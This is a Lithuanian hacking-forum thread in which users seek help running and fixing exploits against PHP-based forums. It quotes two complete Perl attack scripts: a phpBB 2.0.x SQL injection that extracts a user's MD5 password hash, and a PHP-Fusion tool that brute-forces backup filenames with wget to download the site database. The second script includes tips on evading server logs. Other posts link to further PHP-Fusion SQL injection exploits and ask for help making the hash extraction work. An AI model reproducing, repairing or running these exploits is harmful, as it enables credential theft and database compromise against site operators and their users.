Exploit

[DeMO]

Atisiunčiau kažkoki php-5.2.1-win32-installer.msi, bet kaip per jį exploitą paleisti? Hm.. Per perla tai jau ikirtau ir moku laužti.. o per šitą nežinau kaip ten leist..

[GODhack]

Arba mokinkis kas tas php yra arba ir toliau leisk per perla.

[DeMO]

Arba mokinkis kas tas php yra arba ir toliau leisk per perla.

Mokinuosi PHP, tik vat jau 3 valandas sėdžiu ir niekaip negaliu nromalei paleisti Apache.. trumpiau sakant nesamone.. Tai rodo Unable to find logs, paskui rodo kad neranda Servissu.. Nesąmonė krč.. kaip ji po velniu paleisti..

trumpiau sakant, o gal yra koks exploitas perlui, kad php fusion vartotojo hash gauti?

[GODhack]

tikriausiai yra.

[DeMO]

tikriausiai yra.

na bandysiu raustis google'je.

[DeMO]

Reikia pagalbos.. Štai exploitas phpBB forumui, viskas čiki veikia, bet tai krč nerodo hash'o. Rodo finished bet hash nerodo.. Kodėl?

#!/usr/bin/perl

print q{
_________________________________________________________________________

# Exploit: All Topics Hack Sql injection
# For: phpBB ( 2.0.x - 2.0.21 )
_________________________________________________________________________

};

use IO::Socket;

print q{
=> Insert URL
=> without ( http )
=> };
$server = <STDIN>;
chop ($server);
print q{
=> Insert directory
=> es: /forum/ - /phpBB2/
=> };
$dir = <STDIN>;
chop ($dir);
print q{
=> User ID
=> Number:
=> };
$user = <STDIN>;
chop ($user);
if (!$ARGV[2]) {
}
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .= "alltopics.php?mode=&order=ASC&start=-1%20UNION%20SELECT%20user_password%20FROM%20phpbb_ users%20where%20user_id=".$user ;
print "
Exploit in process...\r\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "Exploit failed";
print "Exploit\r\n";
print "in process...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "Exploit finished!\r\n\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "MD5-Hash is: ".$1."\r\n";
}
exit();
}
}

# milw0rm.com [2006-08-23]

[SwaDDie]

if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "MD5-Hash is: ".$1."\r\n";

Kazkas su cia negerai, kadangi perl nlb moku tai teks laukti dedes GODHack
Manau reiktu pataisyt cia kad bet kokiu atveju rodytu HasH netgi jei jis nelygus $1

[xtitanx]

Butu gerai, kad padetu kasnors sita exploita istaisyti, nes as irgi nemoku programuoti

[SwaDDie]

Laukit savaitgalio ir pasirodys dede GODhack

[zigzag]

kasnors turit php-fusion v6.00.305 exploita?
ieskojau neradau

[^Paulius^]

Naudok 6.00.306 versijai. O jie yra 2:
PHP-Fusion <= 6.00.306 (srch_where) SQL Injection Exploit:
http://www.milw0rm.com/exploits/1796
PHP-Fusion <= 6.00.306 Multiple Vulnerabilities Exploit:
http://www.milw0rm.com/exploits/1760

[zigzag]

maciau tuos.bet parasyta ne ta versija galvojau netiks.pabandysim

[Šaras]

Sveiki, gal kas galit trumpai paaiškinti, kaip paleisti PHP exploitą. Ta prasme ko reikia ir ką rašyti per CMD.

[DeMO]

#!/usr/bin/perl
###########################
# D A R K A S S A S S I N S C R E W 2 0 0 5 #
###########################
# Dark Assassins - http://dark-assassins.com/ #
# Visit us on IRC @ irc.tddirc.net #DarkAssassins #
###########################
# phpfusiondb.pl; Version 0.1 22/06/05 #
# PHP-Fusion db backup proof-of-concept by Easyex #
# Database backup vuln in v6.00.105 and below #
###########################
# Description: When a db (database) backup is made #
# it is saved in /administration/db_backups/ on 6.0 #
# and on 5.0 it is saved in /fusion_admin/db_backups/#
# The backup file can be saved in 2 formats: .sql or #
# .sql.gz and is hidden by a blank index.php file but#
# can be downloaded client-side, The filename is for #
# example : backup_2005-06-22_2208.sql.gz so what we #
# can do is generate 0001 to 9999 and request the #
# file and download it. If a db file is found an #
# attacker can get the admin hash and crack it or #
# retrieve other sensitive information from the db! #
###########################

# 9999 requests to the host is alot, And would get noticed in the server log!
# If you re-coded your own script with proxy support you would be fine.
# You need to know the backup year-month-day to be able to find a backup file unless the server is set to automaticlly
# backup the php-fusiondatabase.

my $wget='wget';

my $count='0';

my $target;

if (@ARGV < 4)
{
print "\n";
print "Welcome to the PHP-Fusion db backup vulnerability\n";
print "Coded by Easyex from the Dark Assassins crew\n";
print "\n";
print "Usage: phpfusiondb.pl <host> <version> <file> <extension>\n";
print "Example: phpfusiondb.pl example.com 6 backup_2005-06-23_ .sql.gz\n";
print "\n";
exit();
}

my $host = $ARGV[0];
my $ver = $ARGV[1];
my $file = $ARGV[2];
my $extension = $ARGV[3];

if ($ver eq "6") {
$dir='/administration/db_backups/'; # Directory path to the 6.X backup folder
}

if ($ver eq "5") {
$dir='/fusion_admin/db_backups/'; # Directory path to the 5.X backup folder
}

print "\n";
print "Welcome to the PHP-Fusion db backup vulnerability\n";
print "Coded by Easyex from the Dark Assassins crew\n";
print "\n";

print "Host: $host\n";
print "Directory: $dir\n";
print "File: $file + 0001 to 9999\n";
print "Extension: $extension\n";
print "\n";
print "Attempting to find a db backup file on $host\n";

for($count=0;$count<9999;$count++) {

$target=$host.$dir.$file.sprintf("%04d", $count).$extension;

system("$wget $target");
}

Su šituo irgi problema. šitas turi išplėšti DB iš saito, bet kai viską suvedu rodo kažkoki ensibaigianti užrašą... Help..

[brain5ide]

Išmok programuoti ir galėsi susitvarkyti.